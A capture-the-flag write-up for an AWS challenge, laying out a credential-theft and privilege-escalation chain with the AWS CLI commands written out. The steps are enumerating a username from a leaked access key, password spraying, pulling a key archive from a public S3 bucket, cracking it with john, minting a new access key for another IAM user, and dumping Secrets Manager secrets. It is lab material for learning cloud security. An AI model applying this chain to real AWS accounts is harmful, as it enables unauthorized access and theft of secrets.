Jaeger

Solve

Note that in the lambda function, it contains an access key id.

With the access key id, we are able to enuemrate the username of the access key.

aws iam get-access-key-last-used -access-key-id AKIA6GBMFYWSLBLJMVSE

With the new username, lets just spray the password against this new user to see if we are able to authenticate.

Macie is also a reference to Amazon Macie, which identifies sensitive data in the AWS instances. With the macie user credentials, we are able to find sensitive information or read existing report to try and escalate our privileges through Amazon Macie.

Amazon Macie Dashboard

Looking at the Sumamry Dashboard, there are 6 buckets being sacnned, of which 3 are publicly accesible.

Listing public read access bucket

We had enumerated the it-storage bucket previously so lets look into the other 2 buckets.

Listing of files in contractor-install-tmp-52364 buckets

It seems like within the contractor bucket, there is a file with access key, lets try and dump the file.

aws s3 cp s3://contractor-install-tmp-52364/ext-contractor_accessKeys_24534.zip . --no-sign-request

When attempting to unzip the file, it ask for a password.

We are able to use zip2john along with our existing password wordlist to crack the file.

Cracking a pssword

WIthin the zip file, it contains a AWS Access Key ID and AWS Secret Access Key. We are able to authenticate with it and run get-caller-identity as a sanity check that the key is still working

Next, I will be attempting to enumerate the IAM policy of the user to see if we have any interesting permission.

aws iam list-user-policies --username ext-contractor --profile external
aws iam get-user-policy --user-name ext-contractor --policy-name contractor_policy --profile external

It seems like the ext-contractor user has permission to Create, List and Delete access key for the backup user. Lets try and create a new access key.

aws iam list-access-keys --user-name backup-user --profile external

Each IAM user can only have 2 active access key, so lets delete one of the current access key and create another one.

aws iam delete-access-key --user-name backup-user --access-key-id AKIA6GBMFYWSKHOQDV6X --profile external
aws iam create-access-key --user-name backup-user  --profile external

Lets run get-caller-identity again as a sanity check that the credentials is working properly.

Next, Ill be using the tool bf-aws-permission to bruteforce the user permission.

./bf-aws-permissions.sh -p backup -r us-east-1
output of bf-aws-permissions.sh

It seems like the backup-user have permission over secretsmanager and elastic beanstalk. So lets enumerate those accordingly.

aws secretsmanager list-secrets

Looking at the secretsmanager output, theres 2 secret

  • Flag

  • azure-integration credentials

Lets dump out both secrets

aws secretsmanager describe-secret --secret-id  flag --profile backup
aws secretsmanager get-secret-value --secret-id flag --profile backup
aws secretsmanager describe-secret --secret-id azure-integration --profile backup
aws secretsmanager get-secret-value --secret-id azure-integration --profile backup

TLDR

  • Use get-access-key-last-usedto get the username of the access key from lambda

  • Spray the macie-user-467 user with password wordlist

  • Enumerate Amazon Macie to identify public buckets with files

  • Download contractor-install-tmp-52364/ext-contractor_accessKeys_24534.zip file

  • Crack the password with zip2john and john

  • Autheticate as the ext-contractor user and enumerate IAM

  • Use CreateAccessKey to create a new access key for the backup-user

  • Bruteforce backup-user permissions with bf-aws-permission script

  • Enumerate secretsmanager to get flag as well as credential for azintegration user

Reference

Last updated

Was this helpful?